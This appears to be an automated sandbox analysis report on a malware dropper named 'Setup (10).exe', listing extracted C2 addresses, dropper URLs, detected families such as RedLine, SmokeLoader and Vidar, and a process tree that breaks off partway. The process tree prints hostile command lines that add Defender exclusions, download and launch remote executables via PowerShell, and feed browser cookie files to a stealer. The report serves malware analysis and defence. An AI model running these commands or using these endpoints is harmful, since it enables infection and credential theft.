Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    567s
  • max time network
    1806s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (10).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 25 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 27 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 26 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: SetClipboardViewer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1412
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      PID:2852
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:5912
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2628
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2620
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2424
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2416
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1844
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1252
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1232
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1080
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:860
                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        2⤵
                        • Loads dropped DLL
                        • Suspicious use of FindShellTrayWindow
                        PID:5664
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:1000
                      • C:\Users\Admin\AppData\Local\Temp\Setup (10).exe
                        "C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"
                        1⤵
                        • Checks computer location settings
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:3932
                        • C:\Users\Admin\Documents\Laq5JGnZERJAlgHMV0fMzRiP.exe
                          "C:\Users\Admin\Documents\Laq5JGnZERJAlgHMV0fMzRiP.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:804
                          • C:\Users\Admin\Documents\Laq5JGnZERJAlgHMV0fMzRiP.exe
                            C:\Users\Admin\Documents\Laq5JGnZERJAlgHMV0fMzRiP.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4688
                        • C:\Users\Admin\Documents\59ibZYiG_BhcdFaagWMjQKap.exe
                          "C:\Users\Admin\Documents\59ibZYiG_BhcdFaagWMjQKap.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:880
                        • C:\Users\Admin\Documents\oBhVlMLT3nbjlchVyf74E2Sy.exe
                          "C:\Users\Admin\Documents\oBhVlMLT3nbjlchVyf74E2Sy.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:1096
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                            3⤵
                              PID:4192
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                4⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4832
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                4⤵
                                  PID:956
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                  4⤵
                                    PID:6552
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                    4⤵
                                      PID:8732
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                      4⤵
                                      • Blocklisted process makes network request
                                      PID:6244
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                      4⤵
                                      • Blocklisted process makes network request
                                      PID:9828
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                      4⤵
                                      • Blocklisted process makes network request
                                      PID:1732
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                      4⤵
                                        PID:10052
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                        4⤵
                                          PID:9412
                                          • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                            "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                            5⤵
                                            • Adds Run key to start application
                                            • Suspicious behavior: SetClipboardViewer
                                            PID:9748
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                          4⤵
                                            PID:9868
                                            • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                              "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                              5⤵
                                              • Suspicious use of SetThreadContext
                                              PID:9788
                                              • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                "{path}"
                                                6⤵
                                                  PID:9404
                                        • C:\Users\Admin\Documents\mt0E607oYc2g64ksDhGQ4d9z.exe
                                          "C:\Users\Admin\Documents\mt0E607oYc2g64ksDhGQ4d9z.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:504
                                        • C:\Users\Admin\Documents\iZgbzSOVPKa3ZIJOmVbeExPS.exe
                                          "C:\Users\Admin\Documents\iZgbzSOVPKa3ZIJOmVbeExPS.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of WriteProcessMemory
                                          PID:2308
                                          • C:\Users\Admin\Documents\iZgbzSOVPKa3ZIJOmVbeExPS.exe
                                            C:\Users\Admin\Documents\iZgbzSOVPKa3ZIJOmVbeExPS.exe
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4672
                                        • C:\Users\Admin\Documents\CVYT78L54kD253s1R9LEa5ke.exe
                                          "C:\Users\Admin\Documents\CVYT78L54kD253s1R9LEa5ke.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of WriteProcessMemory
                                          PID:1892
                                          • C:\Users\Admin\Documents\CVYT78L54kD253s1R9LEa5ke.exe
                                            C:\Users\Admin\Documents\CVYT78L54kD253s1R9LEa5ke.exe
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4680
                                        • C:\Users\Admin\Documents\xp9imRUFYulkVzxVw2QgScUm.exe
                                          "C:\Users\Admin\Documents\xp9imRUFYulkVzxVw2QgScUm.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1644
                                        • C:\Users\Admin\Documents\ezRyNEoLfHdUxHqHjC_WyvU6.exe
                                          "C:\Users\Admin\Documents\ezRyNEoLfHdUxHqHjC_WyvU6.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1620
                                          • C:\Users\Admin\AppData\Roaming\4830791.exe
                                            "C:\Users\Admin\AppData\Roaming\4830791.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2584
                                          • C:\Users\Admin\AppData\Roaming\7902167.exe
                                            "C:\Users\Admin\AppData\Roaming\7902167.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:4384
                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              PID:4164
                                          • C:\Users\Admin\AppData\Roaming\5869148.exe
                                            "C:\Users\Admin\AppData\Roaming\5869148.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3720
                                        • C:\Users\Admin\Documents\9TUwe_H_nTwWe2M47IvrezI7.exe
                                          "C:\Users\Admin\Documents\9TUwe_H_nTwWe2M47IvrezI7.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of WriteProcessMemory
                                          PID:2156
                                          • C:\Users\Admin\Documents\9TUwe_H_nTwWe2M47IvrezI7.exe
                                            C:\Users\Admin\Documents\9TUwe_H_nTwWe2M47IvrezI7.exe
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4660
                                        • C:\Users\Admin\Documents\EMcVE7y12U9LIGkEFQs01nKP.exe
                                          "C:\Users\Admin\Documents\EMcVE7y12U9LIGkEFQs01nKP.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2652
                                        • C:\Users\Admin\Documents\3_swCSFoG9_cM5eeBYWzAKZM.exe
                                          "C:\Users\Admin\Documents\3_swCSFoG9_cM5eeBYWzAKZM.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4000
                                        • C:\Users\Admin\Documents\ch0FQW_ZiA4Opi6TfVw7PZjM.exe
                                          "C:\Users\Admin\Documents\ch0FQW_ZiA4Opi6TfVw7PZjM.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3444
                                        • C:\Users\Admin\Documents\tpYgYBGC_NXmt4On2Df_q3N6.exe
                                          "C:\Users\Admin\Documents\tpYgYBGC_NXmt4On2Df_q3N6.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:3568
                                          • C:\Users\Admin\Documents\tpYgYBGC_NXmt4On2Df_q3N6.exe
                                            "C:\Users\Admin\Documents\tpYgYBGC_NXmt4On2Df_q3N6.exe"
                                            3⤵
                                              PID:3016
                                          • C:\Users\Admin\Documents\zNUh0eZDHevEAfLO9de_lf9d.exe
                                            "C:\Users\Admin\Documents\zNUh0eZDHevEAfLO9de_lf9d.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3844
                                          • C:\Users\Admin\Documents\CLCWXnos0yP89XszjkipYKj0.exe
                                            "C:\Users\Admin\Documents\CLCWXnos0yP89XszjkipYKj0.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            PID:4216
                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:1332
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:4284
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:3812
                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:4732
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:4992
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5488
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5284
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:4440
                                              • C:\Windows\system32\WerFault.exe
                                                C:\Windows\system32\WerFault.exe -u -p 4732 -s 1532
                                                4⤵
                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                • Program crash
                                                PID:5616
                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:2812
                                          • C:\Users\Admin\Documents\NPxEWVnltx5yfdUYNA8L0Iln.exe
                                            "C:\Users\Admin\Documents\NPxEWVnltx5yfdUYNA8L0Iln.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4240
                                          • C:\Users\Admin\Documents\cjj5JdPknJbBKTOfyOurwSxI.exe
                                            "C:\Users\Admin\Documents\cjj5JdPknJbBKTOfyOurwSxI.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:4356
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 760
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1200
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 784
                                              3⤵
                                              • Program crash
                                              PID:1324
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 736
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5216
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 824
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5312
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 956
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5424
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 988
                                              3⤵
                                              • Program crash
                                              PID:5560
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1000
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5620
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1412
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5864
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1464
                                              3⤵
                                              • Program crash
                                              PID:6060
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1396
                                              3⤵
                                              • Program crash
                                              PID:5408
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1496
                                              3⤵
                                              • Program crash
                                              PID:6076
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1624
                                              3⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              PID:6128
                                          • C:\Users\Admin\Documents\OnzcUqMK7_qUgLjsFNmkvZpQ.exe
                                            "C:\Users\Admin\Documents\OnzcUqMK7_qUgLjsFNmkvZpQ.exe"
                                            2⤵
                                              PID:4312
                                              • C:\Users\Admin\Documents\OnzcUqMK7_qUgLjsFNmkvZpQ.exe
                                                "C:\Users\Admin\Documents\OnzcUqMK7_qUgLjsFNmkvZpQ.exe" -q
                                                3⤵
                                                • Executes dropped EXE
                                                PID:3472
                                            • C:\Users\Admin\Documents\GyAtZFDp4Pwl81K1vL9Vffo0.exe
                                              "C:\Users\Admin\Documents\GyAtZFDp4Pwl81K1vL9Vffo0.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:4276
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 660
                                                3⤵
                                                • Program crash
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4604
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 704
                                                3⤵
                                                • Program crash
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4848
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 728
                                                3⤵
                                                • Program crash
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4984
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 808
                                                3⤵
                                                • Program crash
                                                PID:1876
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 1172
                                                3⤵
                                                • Program crash
                                                PID:5060
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 1140
                                                3⤵
                                                • Program crash
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4112
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 1164
                                                3⤵
                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                • Executes dropped EXE
                                                • Program crash
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4312
                                            • C:\Users\Admin\Documents\PQs7T_ztdqquCy1uG83T_m03.exe
                                              "C:\Users\Admin\Documents\PQs7T_ztdqquCy1uG83T_m03.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious behavior: MapViewOfSection
                                              PID:5116
                                            • C:\Users\Admin\Documents\fsA8WPMzEjhz3mmxwWiQcc2f.exe
                                              "C:\Users\Admin\Documents\fsA8WPMzEjhz3mmxwWiQcc2f.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:3944
                                              • C:\Users\Admin\AppData\Local\Temp\is-01V46.tmp\fsA8WPMzEjhz3mmxwWiQcc2f.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-01V46.tmp\fsA8WPMzEjhz3mmxwWiQcc2f.tmp" /SL5="$20212,138429,56832,C:\Users\Admin\Documents\fsA8WPMzEjhz3mmxwWiQcc2f.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of FindShellTrayWindow
                                                PID:1136
                                                • C:\Users\Admin\AppData\Local\Temp\is-IBM12.tmp\Setup.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\is-IBM12.tmp\Setup.exe" /Verysilent
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Program Files directory
                                                  PID:5368
                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:2096
                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:5168
                                                    • C:\Users\Admin\AppData\Local\Temp\is-P0S6L.tmp\Inlog.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-P0S6L.tmp\Inlog.tmp" /SL5="$10318,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                      6⤵
                                                        PID:5500
                                                        • C:\Users\Admin\AppData\Local\Temp\is-RBGVP.tmp\Setup.exe
